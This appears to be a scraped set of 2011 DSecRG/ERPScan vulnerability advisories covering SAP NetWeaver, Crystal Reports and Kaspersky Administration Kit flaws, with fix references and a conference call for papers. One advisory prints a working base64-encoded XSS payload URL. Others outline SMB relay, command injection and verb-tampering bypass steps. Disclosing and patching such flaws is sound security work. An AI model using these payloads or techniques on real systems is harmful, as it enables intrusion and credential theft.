[DSECRG-11-031] SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay
[DSECRG-11-031] SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay Security vulnerability was founded in sap EPS_DELETE_FILE RFC function allows attacker to delete files remotely or steal hashes of SAP server account in windows environment using SMBRelay attack. Digital Security Research Group [DSecRG] Advisory (Internal #DSECRG-00195) Application: SAP NetWeaver ABAP Versions Affected: SAP NetWeaver ABAP Vendor URL: www.sap.com Bugs: Auth bypass, directory traversal, smbrelay Exploits: YES Reported:15.01.2011 Vendor response: 25.01.2011 Date of Public Advisory:22.08.2011 CVE-number: Author: Alexey Sintsov from DSecRG (ERPScan subdivision) Description *** Security vulnerability was founded in sap EPS_DELETE_FILE RFC function allows attacker to delete files remotely or steal hashes of SAP server account in windows environment using SMBRelay attack. Details *** Attacker that can execute function EPS_DELETE_FILE remotely using default SAP accounts like TMSADM or SAPCPIC to delete any file in OS or send hashes of SAP account to remote host or conduct smbrelay attack. Example: ** Working exploit will be available in commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) and also in ERPScan pentesting tool. References ** http://dsecrg.com/pages/vul/show.php?id=331 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1554030 Fix Information * Solution to this issue is given in the SAP Security Note 1554030. About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose
[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose com.sap.ipc.webapp.ipcpricing application has information disclose vulnerability Digital Security Research Group [DSecRG] Advisory DSECRG-11-032 (Internal DSecRG-00197) Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.SAP.com Bugs:Information disclosure Exploits:YES Reported:27.01.2011 Vendor response: 28.01.2011 Date of Public Advisory:15.09.2011 CVE-number: Author: Dmitriy Chastuchin from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** com.sap.ipc.webapp.ipcpricing application has information disclose vulnerability Details *** Will be disclosed at Brucon Example: ** Working exploit will be available in commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) and also in ERPScan pentesting tool. References ** http://dsecrg.com/pages/vul/show.php?id=332 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1545883 Fix Information * Solution to this issue is given in the SAP Security Note 1545883. About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-034] SAP NetWeaver J2EE MeSync – information disclose
[DSECRG-11-034] SAP NetWeaver J2EE MeSync – information disclose Attacker can get information about mobile engine version and sometimes the name of the technical user. Application: SAP NetWeaver Versions Affected: SAP NetWeaver MI 2 Vendor URL: http://www.SAP.com Bugs:information disclosure Reported:29.07.2011 Vendor response: 30.07.2011 Date of Public Advisory:11.11.2011 CVSS: CVE-number: Author: Alexander Polyakov from DSecRG (research center of ERPScan) Description *** Attacker can get information about mobile engine version and sometimes the name of the technical user. Details *** Information disclosure vulnerability was founded in SAP NetWeaver Mobile Engine which can help attacker to find information about installed version and patch for NetWeaver and also get username. Example: ** Working exploit is available in commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) References ** http://dsecrg.com/pages/vul/show.php?id=334 Fix Information * This SatFileReceiver servlet is not shipped with MI 2. 7.02 or 7.31.It was used in MI 2.1 which is no longer supported. You should disable this application About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com http://www.erpscan.com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-037] SAP BW Doc - Multiple XSS
[DSECRG-11-037] SAP BW Doc - Multiple XSS BW DOC metadata application in SAP NetWeaver is vulnerable to XSS attack. Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.SAP.com Bugs:XSS Reported:14.03.2011 Vendor response: 16.03.2011 Date of Public Advisory:11.11.2011 CVSS:4.3 CVE-number: Author: Alexandr Polyakov and Dmitriy Chastuchin from DSecRG (research center of ERPScan) Description *** BW DOC metadata in SAP NetWeaver is vulnerable to XSS attack. Details *** XSS found in page /SAP/BW/DOC/METADATA/ Vulnerable parameter - page To avoid XSS protection we use base64 encoding and DATA tag Example: ** http://[SAPSERVER]/SAP/BW/DOC/METADATA/?page=%3Cobject%20data=%22data:text/html; base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=%22%3E%3C/object%3E References ** http://erpscan.com/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/ http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1572325 Fix Information * Solution to this issue is given in the SAP Security Note 1572325. About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com http://www.erpscan.com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability
[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability SAP RSTXSCRP Report has path traversal vulnerability which can lead to SMB relay attack and full control on system. Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.SAP.com Bugs:Path traversal, SMBRelay Reported:14.03.2011 Vendor response: 16.03.2011 Date of Public Advisory:11.11.2011 CVSS:2.1 CVE-number: Author: Dmitriy Chastuchin from DSecRG (research center of ERPScan) Description *** SAP RSTXSCRP Report has path traversal vulnerability which can lead to SMB relay attack and full control on system. Details *** Using transaction sa38 and report RSTXSCRP attacker can insert malicious UNC path in File Name field and chose radio button From/on application server For successful SMB Relay attack realization attacker should enforce to initiate SMB session on attacker server via UNC path request. SMB client will try to access a remote SMB service on an attacker's machine. Example: ** Working exploit is available in commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) References ** http://erpscan.com/advisories/dsecrg-11-038-sap-rstxscrp-report-smb-relay-vulnerability/ http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1583286 Fix Information * Solution to this issue is given in the SAP Security Note 1583286. About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com http://www.erpscan.com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-039] SAP NetWeaver TH_GREP module - Code injection vulnerability (NEW)
[DSECRG-11-039] SAP NetWeaver TH_GREP module - Code injection vulnerability (NEW) TH_GREP report is vulnerable for command execution vulnerability which is working with previous patch (note 1433101). Remote OS command execution is possible Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.SAP.com Bugs:Command execution Reported:08.04.2011 Vendor response: 09.04.2011 Date of Public Advisory:11.11.2011 CVSS:6.0 CVE-number: Author: Alexey Tyurin from DSecRG (research center of ERPScan) Description *** TH_GREP report is vulnerable for command execution vulnerability which is working with previous patch (note 1433101). Remote OS command execution is possible Details *** This vulnerability exists in patched version (note 1433101) because this note secure only linux but we found that windows is vulnerable too. There is ability for command execution via SA TH_GREP RFC-function in OS Windows. The problem contains in user input validation absence of TH_GREP RFC-function's parameters. An attacker can insert malicious code in STRING-parameter for command execution. There are minimum 3 ways of command execution and attacker must have valid credentials: 1) In transaction Se37 2) via startrfc command with TH_GREP RFC-function 3) via a crafted TH_GREP RFC-SOAP-request Example: ** Working exploit is available in commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) References ** http://erpscan.com/advisories/dsecrg-11-039-sap-netweaver-th_grep-module-code-injection-vulnerability-new/ http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1580017 Fix Information * Solution to this issue is given in the SAP Security Note 1580017. About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com http://www.erpscan.com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-040] SAP NetWeaver SPML - XML CSRF user creation
[DSECRG-11-040] SAP NetWeaver SPML - XML CSRF user creation Attacker can create a new user in J2EE Engine using CSRF attack on SPML service. Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.SAP.com Bugs:CSRF Reported:14.03.2011 Vendor response: 15.03.2011 Date of Public Advisory:11.11.2011 CVSS:7.3 CVE-number: Author: Alexandr Polyakov from DSecRG (research center of ERPScan) Description *** Attacker can create a new user in J2EE Engine using CSRF attack on SPML service Details *** SPML service can be used to make various actions including user management, role management etc. Attacker can generate HTTP page with XML call to SPML service and send a link to administrator. Example: ** Working exploit is available in commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) References ** http://erpscan.com/advisories/dsecrg-11-040-sap-netweaver-spml-xml-csrf-user-creation/ http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1616058 http://erpscan.com/wp-content/uploads/2011/08/A-crushing-blow-at-the-heart-SAP-J2EE-engine_whitepaper.pdf Fix Information * Solution to this issue is given in the SAP Security Note 1616058 About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com http://www.erpscan.com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-041] SAP NetWeaver - Authentication bypass (Verb Tampering)
[DSECRG-11-041] SAP NetWeaver - Authentication bypass (Verb Tampering) Authentication bypass vulnerability in SAP NetWeaver CTC service can be exploited for unauthorized user management and OS command execution. Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.SAP.com Bugs:Auth bypass, Verb tampering Reported:14.03.2011 Vendor response: 15.03.2011 Date of Public Advisory:11.11.2011 CVSS:7.3 by SAP (10 by ERPSCAN) CVE-number: Author: Alexandr Polyakov from DSecRG (research center of ERPScan) Description *** Authentication bypass vulnerability in SAP NetWeaver CTC service can be exploited for unauthorized user management and OS command execution. Details *** Attacker can bypass Authentication using Verb Tampering vulnerability Example: ** Working exploit is available in commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) References ** http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/ http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1589525 http://erpscan.com/wp-content/uploads/2011/08/A-crushing-blow-at-the-heart-SAP-J2EE-engine_whitepaper.pdf Fix Information * Solution to this issue is given in the SAP Security Note 1589525, 1624450 About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com http://www.erpscan.com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability XSS vulnerability found in pubDBLogon.jsp page of SAP Crystal Report Server 2008. Application: SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://www.sap.com Bugs: Linked XSS Vulnerability Exploits: YES Reported: 09.12.2010 Vendor response: 10.12.2010 Date of Public Advisory: 15.09.2011 Authors: Dmitry Chastuhin Description SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet. Details ** Vulnerability discovered in JSP – page pubDBLogon.jsp Vulnerable parameter - service . Any user can cheat a vulnerable link and steal user's or Administrator's cookie. References ** http://dsecrg.com/pages/vul/show.php?id=333 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1562292 Fix Information * Solution to this issue is given in the SAP Security Note 1562292. About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com Polyakov Alexander CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
CFP for first independent international Security Conference in Russia - ZeroNights (by Defcon-Russia)
http://zeronights.org/request Saint-Petersburg, Russia, 25th of November CFP consist of 2 steps Participation requests admission of the first step is till 20.09.11 Program committee decision about the first part of speakers will be available on the 30.09.11 Participation requests admission of the second step is till 20.10.11 Final program committee decision will be available on the 30.10.11 The requests should be sent to c...@zeronights.ru. The reporters request must consist of: Name and surname E-mail Biografy (in short) Job, position Residence Report name Brief description of presentation (not more than 500 words, this is description for web-site) Full description (technical details): if there are 0-day vulnerabilities description if any tools will be presented at the conference Topic status (if it was previously shown/published, if yes – when and where) Personal requirements for presentation We are highly interested in the following topics: Corporative applications security Security of applications and services operating with financial funds State projects security SCADA security Communication systems security Russian software security Mobile devices security Malicious software Social networks and WEB 2.0 hacking Program researching without sources Vulnerability searching and exploiting Software, hardware and networks researching This topic list is not full but preferable. Presentations on other subjects can be considered as well. We do not accept marketing talks or talks aimed to any products sales without technical information. Slides/talk must be presented in Russian or English. As a speaker, you will receive a partial refund of your travel expenses Good mood, pleasant community and a lot of unforgettable feelings in the north capital of Russia are guaranteed. Polyakov Alexander. QSA,PA-QSA CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose (by ERPScan)
[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose com.sap.ipc.webapp.ipcpricing application has information disclose vulnerability Digital Security Research Group [DSecRG] Advisory DSECRG-11-032 (Internal DSecRG-00197) Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL: http://www.SAP.com Bugs: Information disclosure Exploits: YES Reported: 27.01.2011 Vendor response: 28.01.2011 Date of Public Advisory: 15.09.2011 CVE-number: Author: Dmitriy Chastuchin from DSecRG (subdivision of ERPScan) Description *** com.sap.ipc.webapp.ipcpricing application has information disclose vulnerability Details *** Will be disclosed at Brucon Example: ** Working exploit will be available in commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) and also in ERPScan pentesting tool. References ** http://erpscan.com/advisories/dsecrg-11-032-sap-netweaver-ipcpricing-information-disclose/ http://dsecrg.com/pages/vul/show.php?id=332 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1545883 Fix Information * Solution to this issue is given in the SAP Security Note 1545883. About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: info [at] erpscan [dot] com Polyakov Alexander. QSA,PA-QSA CTO ERPScan Head of DSecRG __ phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@erpscan.com www.erpscan.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-018] Kaspersky administration Kit - Remote code execution via SMBRelay
Digital Security Research Group [DSecRG] Advisory #DSECRG-11-018 Application: Kaspersky Administration Kit Versions Affected: from 6.0 Vendor URL: http://www.kaspersky.com Bug: Design flaw Exploits:YES Reported:22.01.2011 Vendor response: 22.01.2011 Solution:disable IP scan Date of Public Advisory: 14.03.2011 Authors: Alexey Sintsov of Digital Security Research Group [DSecRG] Description *** Service account used for Kaspersky Administration Kit and it functional make possible attack on other hosts in a corporate network. Details *** Functional called Scan IP subnets is enabled by default in Kaspersky Administration Kit 6. This function makes ICMP scan and also tries to use SMB protocol by using service account which can be used to run SMBrelay attack and gain full control on secured network. By default Scan IP subnets scans subnet every 7 hours. Attacker just needs to run SMBRelay tool and wait. Attack is possible because Kaspersky service account have Administrative rights on hosts in corporate network. It's mean that attacker can attack any server or workstation where this service account has rights. Fix Information *** 1) Do not start Administration Server service under a Domain Administrator account or a domain account member of local administrators group on other hosts. 2) Disable Scan IP subnets http://support.kaspersky.com/faq/?qid=208284121 References * http://dsecrg.ru/pages/vul/show.php?id=318 http://dsecrg.blogspot.com/2011/03/smbrelay-bible-4-smbrelay-with-no.html About DSecRG *** The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPSCAN security scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPSCAN consulting services and protects you from the latest threads. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com About ERPScan *** ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and service ERPScan Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. “ERPScan Security Scanner for SAP” is an innovative product for integrated assessment of SAP platform security and standard compliance. Contact: info [at] erpscan [dot] com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS
[DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS SAP NetWeaver Integration Directory has linked XSS vulnerability. Digital Security Research Group [DSecRG] Advisory DSecRG-11-013 (Internal DSecRG-00163) Application: SAP NetWeaver Runtime Versions Affected: SAP NetWeaver Runtime Vendor URL: http://www.sap.com Bugs:Linked XSS and Stored XSS Exploits:YES Reported:11.05.2010 Vendor response: 12.05.2010 Date of Public Advisory:09.03.2011 CVE-number: Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** SAP NetWeaver Integration Directory has linked XSS vulnerability. 1. XSS in error_msg.jsp 2. XSS in ViewCaches.jsp 3. Stored XSS in ViewLogger.jsp 4. POST and Stored XSS in ShowMemLog Details *** 1. Vulnerable script: error_msg.jsp Vulnerable parameters: id 2. Vulnerable script: ViewCaches.jsp Vulnerable parameters: refresh 3. Vulnerable script: ViewLogger.jsp Vulnerable parameters: logger 4. Vulnerable servlet: ShowMemLog Vulnerable parameters: thread, class (stored xss), invert, filter Example: ** Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com). References ** http://dsecrg.com/pages/vul/show.php?id=313 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1512776 Fix Information * Solution to this issue is given in the 1512776 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product 